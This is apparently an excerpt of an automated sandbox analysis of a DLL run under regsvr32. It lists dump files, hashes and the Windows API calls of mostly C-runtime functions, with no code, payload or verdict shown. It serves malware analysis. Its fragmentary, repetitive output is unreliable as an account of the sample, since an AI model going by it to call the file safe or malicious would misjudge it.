                                                                                                                                • Instruction Fuzzy Hash: AA2148B4508384CBD349DF29D05951BBBE0BB8D75CF900B1DF4CAAB264D7789644CB0A
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d7cc4962d52e3e4a2947f3a3b752558ec936755315000d7411880e05df0ff2ae
                                                                                                                                • Instruction ID: eb4eeff74ed6a28dce01163b60c3caa59df3a9419c4884eb31ad9c6c3703feed
                                                                                                                                • Opcode Fuzzy Hash: d7cc4962d52e3e4a2947f3a3b752558ec936755315000d7411880e05df0ff2ae
                                                                                                                                • Instruction Fuzzy Hash: 51B09B2570CB55454775470754046156592B79CBE460440349D0D53B64D93C96504740
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: free$ErrorFreeHeapLast_errno
• String ID:
• API String ID: 1012874770-0
• Opcode ID: b5d5b29a13da0feaba005b5cdbb38ef60d3e58c86b165e4530729409fd253580
• Instruction ID: 6abf8ca1585f86a1f805ba7079df759a3c838e6aedc6a83037ae903e0338d47e
• Opcode Fuzzy Hash: b5d5b29a13da0feaba005b5cdbb38ef60d3e58c86b165e4530729409fd253580
• Instruction Fuzzy Hash: F6417522B15583C1EE66EB39D4913BD63E4AF84B54F086131DB4D4B1FBCE15D845C352
Uniqueness
• Uniqueness Score: -1.00%
APIs
• LoadLibraryA.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D0F5
• GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D111
• GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D139
• EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D142
• GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D158
• EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D161
• GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D177
• EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D180
• GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D19E
• EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D1A7
• DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D1D9
• DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D1E8
• DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D240
• DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D260
• DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D279
Strings
Similarity
• API ID: Pointer$AddressDecodeProc$Encode$LibraryLoad
• String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
• API String ID: 3085332118-232180764
• Opcode ID: 3571919baaed57aa13675d85a49604ff28a57139c9f79241176628fa60ae3818
• Instruction ID: 73be254e53e43f813fd17cc8408bc2ef7f4e80cae17e4282b456f22ec2bddc6e
• Opcode Fuzzy Hash: 3571919baaed57aa13675d85a49604ff28a57139c9f79241176628fa60ae3818
• Instruction Fuzzy Hash: 4351F460E1EB4381FD66EB52A94037573E06F49BA0F544135DC9E077F5EE3CE44A8202
Uniqueness
• Uniqueness Score: -1.00%
APIs
• CompareStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFFEFBA07CE), ref: 00007FFFEFBA02F9
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFFEFBA07CE), ref: 00007FFFEFBA030D
• GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFFEFBA07CE), ref: 00007FFFEFBA0410
Strings
Similarity
• API ID: CompareErrorInfoLastString
• String ID: Qr2_:g
• API String ID: 3723911898-1052752507
• Opcode ID: 1736e87f58a818c08770fb04f896c77e61df6c5aeab6e96dba7049e62cf85715
• Instruction ID: f79f8720057836d9e9763ebe4fe2c4ed7685b26b49848c2d80873e2a0f453ba6
• Opcode Fuzzy Hash: 1736e87f58a818c08770fb04f896c77e61df6c5aeab6e96dba7049e62cf85715
• Instruction Fuzzy Hash: 3DE18C22E08A838BEB309F1594543BD3AD2FB887E4F548535DA5E47BE4CE3CA944C702
Uniqueness
• Uniqueness Score: -1.00%
APIs
Similarity
• API ID: Pointer$DecodeEncode$ConsoleCtrlErrorHandlerLast__doserrno_errno_lock
• String ID:
• API String ID: 3466867069-0
• Opcode ID: 789b8b4bb0ab73352cc37038b561749136146399fcf5725f1f3e9913cb8e60dd
• Instruction ID: a84a9259032125fc660d9e3f6a40b667aea1e7a113c5c6f06195aaf986cd7648
• Opcode Fuzzy Hash: 789b8b4bb0ab73352cc37038b561749136146399fcf5725f1f3e9913cb8e60dd
• Instruction Fuzzy Hash: 26718C61F0DA4391FA699719D89537933D2EF42BB0FB84536C95E06AF1EE2CE841C243
Uniqueness
• Uniqueness Score: -1.00%
APIs
Strings
Similarity
• API ID: free$ErrorInfoLast
• String ID: Qr2_:g
• API String ID: 189849726-1052752507
• Opcode ID: 5e1deda3965494b22b6a4b1c1a8d863e304f3e95d2d689d04d0c4e6b189d07b4
• Instruction ID: 87c237077a625b691eb3a1039054009ab15a1aec2eb1bede7eaa8d8333b4074b
• Opcode Fuzzy Hash: 5e1deda3965494b22b6a4b1c1a8d863e304f3e95d2d689d04d0c4e6b189d07b4
• Instruction Fuzzy Hash: 05B1AB32B0869286DB20CB29A4503AD77E8FB49B64F94413AEB9C877F5DF39D541CB01
Uniqueness
• Uniqueness Score: -1.00%
APIs
Similarity
• API ID: free$_lock$ErrorFreeHeapLast_errno
• String ID:
• API String ID: 1575098132-0
• Opcode ID: d886c0d7000bdee151ce2691e9d9b5ad3208a0c45e3f1c810682f6e78acd55a8
• Instruction ID: 34f6cc1ff8d530e89010ea8d1eeff2a1a8d24e90a3682d3d68d0592fbd1dc6d0
• Opcode Fuzzy Hash: d886c0d7000bdee151ce2691e9d9b5ad3208a0c45e3f1c810682f6e78acd55a8
• Instruction Fuzzy Hash: 13310E25F1A94385FE69EB6590A137973D5AF80BA4F081539EA0E076FACF1CE8418353
Uniqueness
• Uniqueness Score: -1.00%
APIs
• GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFEFB9E292
• GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFEFB9E2B1
• MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFEFB9E356
• MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFEFB9E3B5
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFEFB9E3F0
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFEFB9E42C
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFEFB9E46C
• free.LIBCMT ref: 00007FFFEFB9E47A
• free.LIBCMT ref: 00007FFFEFB9E49C
Strings
Similarity
• API ID: ByteCharMultiWide$Infofree
• String ID: Qr2_:g
• API String ID: 1638741495-1052752507
• Opcode ID: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
• Instruction ID: 27eb4293fad97f40f2b309a194c789f1411ea50a8ba4d3183b267afffe95659d
• Opcode Fuzzy Hash: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
• Instruction Fuzzy Hash: B561C332A0868386E7249B25D8403BD76D5FB84BB8F548A35DA1D87BF4DF3CD5418212
Uniqueness
• Uniqueness Score: -1.00%
APIs
• GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFFEFB99206), ref: 00007FFFEFB98F94
• GetLastError.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFFEFB99206), ref: 00007FFFEFB98FA6
• MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFFEFB99206), ref: 00007FFFEFB99006
• MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFFEFB99206), ref: 00007FFFEFB990BC
• GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFFEFB99206), ref: 00007FFFEFB990D3
• free.LIBCMT ref: 00007FFFEFB990E4
• GetStringTypeA.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFFEFB99206), ref: 00007FFFEFB99161
• free.LIBCMT ref: 00007FFFEFB99171
  • Part of subcall function 00007FFFEFB9E23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFEFB9E292
  • Part of subcall function 00007FFFEFB9E23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFEFB9E2B1
  • Part of subcall function 00007FFFEFB9E23C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFEFB9E3B5
  • Part of subcall function 00007FFFEFB9E23C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFEFB9E3F0
Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharMultiWide$StringType$Infofree$ErrorLast
                                                                                                                                • String ID: Qr2_:g
                                                                                                                                • API String ID: 3535580693-1052752507
                                                                                                                                • Opcode ID: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
                                                                                                                                • Instruction ID: 98a2b8ab90c57cb4302e80ac3934ed73b093d5f4d003abfc921dde78d2d8fe34
                                                                                                                                • Opcode Fuzzy Hash: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
                                                                                                                                • Instruction Fuzzy Hash: 8061A232B0869396EB609F21D44467977D2FB48BF4B544635EA2E53BF4EE3CE8418342
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLastfree
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 994105223-0
                                                                                                                                • Opcode ID: f850f7f34601db923eac004d86ac393417d210c29532925b20230ca42a5e0836
                                                                                                                                • Instruction ID: f04231d866f97c636953c9ff7e9296ec7cb1398016aafdcfa5c2c7477f671d29
                                                                                                                                • Opcode Fuzzy Hash: f850f7f34601db923eac004d86ac393417d210c29532925b20230ca42a5e0836
                                                                                                                                • Instruction Fuzzy Hash: C0415D22B0D79782EA649B15A55423977E6FF88BE0F588434DA4E07BF4DE3CE491C702
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1012874770-0
                                                                                                                                • Opcode ID: 3c3af7d426be30cf8e9a0f4f5ff6786eb9999c553a10af8131577c7025441718
                                                                                                                                • Instruction ID: 0b234a765b735027e9d2c4669be139dc67a46fbd9216e93775635fb1f145c0bc
                                                                                                                                • Opcode Fuzzy Hash: 3c3af7d426be30cf8e9a0f4f5ff6786eb9999c553a10af8131577c7025441718
                                                                                                                                • Instruction Fuzzy Hash: 89410C32A09A87C4EF65DF25D5903B933E4AF84B64F089031DA0D4A6F9DF2DE891C352
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free$_errno$DecodeEnvironmentPointerVariable__wtomb_environ
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3451773520-0
                                                                                                                                • Opcode ID: e694225545c17882180803efd4dd10bf6022db2104e00cc5aed2eaf73a595679
                                                                                                                                • Instruction ID: c953aef9ff8ec9834251d9a416ed3b49869557a098679cba04483d0dea66beba
                                                                                                                                • Opcode Fuzzy Hash: e694225545c17882180803efd4dd10bf6022db2104e00cc5aed2eaf73a595679
                                                                                                                                • Instruction Fuzzy Hash: FAA1A12AF0DE4341EA20AB25A91037A72D5FF807F8F548635D95E477F5DE3CA4998302
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DecodePointer$_initterm$ExitProcess_lock
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2551688548-0
                                                                                                                                • Opcode ID: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
                                                                                                                                • Instruction ID: 7c6580cefd3d0df43f17690d25d533ea524e308fdbde6f14ce15f1066e8e367d
                                                                                                                                • Opcode Fuzzy Hash: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
                                                                                                                                • Instruction Fuzzy Hash: 7F415B21A0EA4381FA50AB19EC4037972E9BF887A4F584135EA5E43BF5EF3CE455C742
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • GetStartupInfoA.KERNEL32 ref: 00007FFFEFB9377D
                                                                                                                                  • Part of subcall function 00007FFFEFB93108: Sleep.KERNEL32(?,?,0000000A,00007FFFEFB92DA3,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9314D
                                                                                                                                • GetFileType.KERNEL32 ref: 00007FFFEFB938FA
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileInfoSleepStartupType
                                                                                                                                • String ID: @
                                                                                                                                • API String ID: 1527402494-2766056989
                                                                                                                                • Opcode ID: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
                                                                                                                                • Instruction ID: d6e3631f1b0581ada00b29eecf893cd5c3968479d1c5224bcf578444f9977ab2
                                                                                                                                • Opcode Fuzzy Hash: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
                                                                                                                                • Instruction Fuzzy Hash: 7F912A22B18A8385E7508B28D4887683BD9BB06774F694735C67E463F1DF7DE846C312
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _errno$_getptd
                                                                                                                                • String ID: +$-$0$0
                                                                                                                                • API String ID: 3432092939-699404926
                                                                                                                                • Opcode ID: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
                                                                                                                                • Instruction ID: 43bc46b6dd0fa8c71a1270d3642b4b275a65284b502b21386fddb19ff0f5df55
                                                                                                                                • Opcode Fuzzy Hash: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
                                                                                                                                • Instruction Fuzzy Hash: AA71D222D0C68385FBB64A25D85537A36D5AF46774F298136CE5E126F1DE7CEC818303
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • _FF_MSGBANNER.LIBCMT ref: 00007FFFEFB96ADF
                                                                                                                                  • Part of subcall function 00007FFFEFB96F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFFEFB97194,?,?,?,?,00007FFFEFB96C69,?,?,00000000,00007FFFEFB930C0), ref: 00007FFFEFB96FCF
                                                                                                                                  • Part of subcall function 00007FFFEFB9334C: ExitProcess.KERNEL32 ref: 00007FFFEFB9335B
                                                                                                                                  • Part of subcall function 00007FFFEFB9309C: Sleep.KERNEL32(?,?,00000000,00007FFFEFB96B19,?,?,00000000,00007FFFEFB96BC3,?,?,?,?,?,?,00000000,00007FFFEFB92DC8), ref: 00007FFFEFB930D2
                                                                                                                                • _errno.LIBCMT ref: 00007FFFEFB96B21
                                                                                                                                • _lock.LIBCMT ref: 00007FFFEFB96B35
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB96B57
                                                                                                                                • _errno.LIBCMT ref: 00007FFFEFB96B5C
                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FFFEFB96BC3,?,?,?,?,?,?,00000000,00007FFFEFB92DC8,?,?,?,00007FFFEFB92DFF), ref: 00007FFFEFB96B82
                                                                                                                                Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfree
• String ID:
• API String ID: 1354249094-0
• Opcode ID: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
• Instruction ID: e270030fe64e245b2bfd247fe30da1c4b263767265ea8969c9c69be7937dfc99
• Opcode Fuzzy Hash: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
• Instruction Fuzzy Hash: 12219D24E1DA0382F665AB10A45537A72EEEF847B0F045035EA4E476F6DF3CE8408702
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB92D7A
• FlsGetValue.KERNEL32(?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB92D88
• SetLastError.KERNEL32(?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB92DE0
  • Part of subcall function 00007FFFEFB93108: Sleep.KERNEL32(?,?,0000000A,00007FFFEFB92DA3,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9314D
• FlsSetValue.KERNEL32(?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB92DB4
• free.LIBCMT ref: 00007FFFEFB92DD7
• GetCurrentThreadId.KERNEL32 ref: 00007FFFEFB92DC8
Similarity
• API ID: ErrorLastValue_lock$CurrentSleepThreadfree
• String ID:
• API String ID: 3106088686-0
• Opcode ID: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
• Instruction ID: 0bba00534ad186b53a260f21955c03a9261c5413c0272043e403f60cd33203e4
• Opcode Fuzzy Hash: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
• Instruction Fuzzy Hash: 1A014424F09F4386FB659B65A44433972E2AF487B0B584234C92E027F5DE3CE494C222
Uniqueness
Uniqueness Score: -1.00%

Similarity
• API ID: _getptd
• String ID: Qr2_:g
• API String ID: 3186804695-1052752507
• Opcode ID: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
• Instruction ID: 3d88058773d3e8911292328eb3616fa57053581f2d8d37515f77dfc8c1d7231a
• Opcode Fuzzy Hash: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
• Instruction Fuzzy Hash: 1F818D72A0968796DB24DF25E1847AAB7E0FB447A4F504135EB8D47BA4EF3CE450CB01
Uniqueness
Uniqueness Score: -1.00%

Similarity
• API ID: free$ErrorFreeHeapLast_errno
• String ID:
• API String ID: 1012874770-0
• Opcode ID: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
• Instruction ID: cd0479f45b77cc195e5cacee0b5888c25e9329871216d6feffff4a24a3db1a2f
• Opcode Fuzzy Hash: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
• Instruction Fuzzy Hash: 9101BA63A0884391EEA5DB65D4D137973E9AF94720F481031D60E865F5DF6DF8858313
Uniqueness
